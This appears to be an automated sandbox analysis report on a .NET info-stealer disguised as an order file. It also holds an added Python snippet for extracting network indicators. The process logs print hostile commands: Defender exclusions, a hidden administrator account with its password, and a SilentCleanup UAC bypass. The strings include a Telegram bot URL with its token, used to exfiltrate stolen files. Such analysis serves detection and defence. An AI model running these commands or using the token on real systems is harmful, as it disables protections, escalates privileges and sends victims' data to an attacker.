Source: Yara match | File source: 00000020.00000002.786901859.0000000005F70000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000029.00000003.814234215.0000000006432000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000029.00000002.920418875.0000000005C10000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000003.756169106.0000000006B42000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000029.00000002.916893319.0000000004381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000029.00000002.911408277.000000000413D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000003.735522789.00000000067C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.871462494.00000000038F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.706917679.00000000062D2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000002.927142303.000000000478D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.895927015.0000000005330000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: #NEW ORDER FOR JANUARY 2022.exe PID: 6588, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 4876, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6712, type: MEMORYSTR

Source: #NEW ORDER FOR JANUARY 2022.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: #NEW ORDER FOR JANUARY 2022.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: Binary string: aspnet_regbrowsers.pdbp | source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.730764637.00000000036ED000.00000004.00000001.sdmp
Source: Binary string: aspnet_regbrowsers.pdbp??? |?_CorExeMainmscoree.dll?% @ | source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.779987071.000000000474D000.00000004.00000001.sdmp
Source: Binary string: ???Oy??.pdbError: CoCreateInstance(IID_ISymUnmanagedWriter) returns %X | source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp
Source: Binary string: ComSvcConfig.pdb?x | source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp
Source: Binary string: aspnet_regbrowsers.pdb | source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.730764637.00000000036ED000.00000004.00000001.sdmp
Source: Binary string: ilasm.pdb | source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp
Source: Binary string: E:\A\_work\940\s\obj\Editor\IntellisenseDef\Release\net472\Microsoft.VisualStudio.Language.Intellisense.pdb | source: svchost.exe, svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp
Source: Binary string: ComSvcConfig.pdb | source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp

Networking:

Uses the Telegram API (likely for C&C communication)
Source: unknown | DNS query: name: api.telegram.org
Source: aspnet_regbrowsers.exe, 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp | String found in binary or memory: http://YsLVkm.com
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.723973005.0000000003251000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.759358172.00000000033E1000.00000004.00000001.sdmp, svchost.exe, 00000024.00000002.804585113.00000000037A1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/
Source: aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://api.telegram.org/bot2030557675:AAF2CRvHF_rfT7tYXz9VN8YUb6kF5qxu_xg/
Source: aspnet_regbrowsers.exe, 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org/bot2030557675:AAF2CRvHF_rfT7tYXz9VN8YUb6kF5qxu_xg/sendDocumentdocument-----
Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: aspnet_regbrowsers.exe, 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown | DNS traffic detected: queries for: api.telegram.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Window created: window name: CLIPBRDWNDCLASS
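The memory strings above mix the actionable material (the Telegram Bot API URL carrying the bot token and the `sendDocument` method used for exfiltration, api.ipify.org for the public-IP lookup, the Tor Browser download URL) with noise every .NET binary carries (schemas.xmlsoap.org, tempuri.org, a `127.0.0.1` format fragment) and with concatenation artefacts such as `DynDns.comDynDNS`. The following is an added example, not part of the report, that turns such a string dump into reviewable IOCs: the input strings are copied from the Networking section, while the benign-host list, the public-IP-service list and the category names are this example's own choices.

```python
"""Extract network IOCs from sandbox memory strings and separate them from .NET noise.

STRINGS is copied from the report's Networking section; BENIGN_HOSTS, PUBLIC_IP_SERVICES
and the category names are this example's own assumptions.
"""
import re
from urllib.parse import urlsplit

STRINGS = [
    "http://127.0.0.1:HTTP/1.1",
    "http://DynDns.comDynDNS",
    "http://YsLVkm.com",
    "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name",
    "http://tempuri.org/",
    "https://api.ipify.org%GETMozilla/5.0",
    "https://api.telegram.org/bot2030557675:AAF2CRvHF_rfT7tYXz9VN8YUb6kF5qxu_xg/",
    "https://api.telegram.org/bot2030557675:AAF2CRvHF_rfT7tYXz9VN8YUb6kF5qxu_xg/sendDocumentdocument-----",
    "https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha",
]

# XML/WCF namespace URLs present in ordinary .NET assemblies; not indicators
BENIGN_HOSTS = {"schemas.xmlsoap.org", "tempuri.org", "schemas.microsoft.com", "www.w3.org"}
# Services stealers query to learn the victim's public IP
PUBLIC_IP_SERVICES = {"api.ipify.org", "checkip.dyndns.org", "ipinfo.io", "icanhazip.com"}
# Stop the URL at whitespace or at a format specifier ('%') glued on by string concatenation
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s%\"'<>]*)?")
# Telegram Bot API credential: numeric bot id, colon, secret (35 characters in practice)
TOKEN_RE = re.compile(r"/bot(\d+):([A-Za-z0-9_-]+)")
METHOD_RE = re.compile(r"/bot\d+:[A-Za-z0-9_-]+/(sendDocument|sendMessage|sendPhoto|getMe|getUpdates)")


def classify(host):
    if host == "localhost" or host.startswith("127."):
        return "loopback"
    if host in BENIGN_HOSTS:
        return "benign_namespace"
    if host == "api.telegram.org":
        return "telegram_bot_api"
    if host in PUBLIC_IP_SERVICES:
        return "public_ip_lookup"
    return "review"  # includes concatenation artefacts such as DynDns.comDynDNS


def extract_iocs(strings):
    """Return {'telegram_bots': {bot_id: {...}}, 'hosts': {host: category}, 'dropped': [url]}."""
    iocs = {"telegram_bots": {}, "hosts": {}, "dropped": []}
    for s in strings:
        m = URL_RE.search(s)
        if not m:
            continue
        url = m.group(0)
        host = (urlsplit(url).hostname or "").lower()
        cat = classify(host)
        if cat in ("loopback", "benign_namespace"):
            iocs["dropped"].append(url)
            continue
        iocs["hosts"].setdefault(host, cat)
        t = TOKEN_RE.search(s)
        if t:  # the token is the C2 credential; the method tells you what the bot was used for
            bot = iocs["telegram_bots"].setdefault(t.group(1), {"token": t.group(2), "methods": set()})
            mm = METHOD_RE.search(s)
            if mm:
                bot["methods"].add(mm.group(1))
    return iocs


if __name__ == "__main__":
    result = extract_iocs(STRINGS)
    for host, cat in sorted(result["hosts"].items()):
        print(f"{cat:18} {host}")
    for bot_id, info in result["telegram_bots"].items():
        print(f"telegram bot {bot_id}: methods={sorted(info['methods'])} token={info['token']}")
```

The one thing to take from the output is that the bot token is the credential the operator uses to receive stolen data, so it is the indicator worth blocking and reporting; `www.theonionrouter.com` and the two short hosts land in `review` rather than being auto-trusted or auto-blocked, because nothing in the strings alone says whether they were ever contacted.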

System Summary:

Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: #NEW ORDER FOR JANUARY 2022.exe
.NET source code contains very large array initializations
Source: 31.0.aspnet_regbrowsers.exe.400000.4.unpack, <PrivateImplementationDetails>{F45394B2-D558-4194-B6CC-FB5B9687D7DA}/9118B742-0D2F-474D-AB7B-6EF15BBBF32F.cs | Large array initialization: .cctor: array initializer size 12088
Source: 31.0.aspnet_regbrowsers.exe.400000.1.unpack, <PrivateImplementationDetails>{F45394B2-D558-4194-B6CC-FB5B9687D7DA}/9118B742-0D2F-474D-AB7B-6EF15BBBF32F.cs | Large array initialization: .cctor: array initializer size 12088
Source: 31.0.aspnet_regbrowsers.exe.400000.0.unpack, <PrivateImplementationDetails>{F45394B2-D558-4194-B6CC-FB5B9687D7DA}/9118B742-0D2F-474D-AB7B-6EF15BBBF32F.cs | Large array initialization: .cctor: array initializer size 12088
Source: 31.0.aspnet_regbrowsers.exe.400000.2.unpack, <PrivateImplementationDetails>{F45394B2-D558-4194-B6CC-FB5B9687D7DA}/9118B742-0D2F-474D-AB7B-6EF15BBBF32F.cs | Large array initialization: .cctor: array initializer size 12088
Source: 31.0.aspnet_regbrowsers.exe.400000.3.unpack, <PrivateImplementationDetails>{F45394B2-D558-4194-B6CC-FB5B9687D7DA}/9118B742-0D2F-474D-AB7B-6EF15BBBF32F.cs | Large array initialization: .cctor: array initializer size 12088
Source: 31.2.aspnet_regbrowsers.exe.400000.0.unpack, <PrivateImplementationDetails>{F45394B2-D558-4194-B6CC-FB5B9687D7DA}/9118B742-0D2F-474D-AB7B-6EF15BBBF32F.cs | Large array initialization: .cctor: array initializer size 12088
Source: #NEW ORDER FOR JANUARY 2022.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | File created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.719160313.0000000000EBA000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.VisualStudio.Language.Intellisense.dllT vs #NEW ORDER FOR JANUARY 2022.exe
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.730764637.00000000036ED000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameaspnet_regbrowsers.exeT vs #NEW ORDER FOR JANUARY 2022.exe
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.719405918.00000000012F8000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs #NEW ORDER FOR JANUARY 2022.exe
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000003.705890791.0000000004E74000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameQfpw Hvc.exe2 vs #NEW ORDER FOR JANUARY 2022.exe
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734261757.000000000428D000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameQfpw Hvc.exe2 vs #NEW ORDER FOR JANUARY 2022.exe
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.730697748.00000000036E3000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameQfpw Hvc.exe2 vs #NEW ORDER FOR JANUARY 2022.exe
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameQfpw Hvc.exe2 vs #NEW ORDER FOR JANUARY 2022.exe
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp | Binary or memory string: get_OriginalFileName vs #NEW ORDER FOR JANUARY 2022.exe
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp | Binary or memory string: backupOfOriginalFileName vs #NEW ORDER FOR JANUARY 2022.exe
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp | Binary or memory string: originalFileName vs #NEW ORDER FOR JANUARY 2022.exe
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameComSvcConfig.exeT vs #NEW ORDER FOR JANUARY 2022.exe
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameaspnet_regbrowsers.exeT vs #NEW ORDER FOR JANUARY 2022.exe
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameZakrytyeKupla.exe< vs #NEW ORDER FOR JANUARY 2022.exe
Source: #NEW ORDER FOR JANUARY 2022.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: svchost.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: #NEW ORDER FOR JANUARY 2022.exe | ReversingLabs: Detection: 18%
Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | File read: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe"
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators ADMIN~1 /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup users "user" /add
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup users "user" /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators "user" /del
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators "user" /del
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: unknownProcess created: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\SysWOW64\net1.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup users "user" /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators "user" /del
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /add
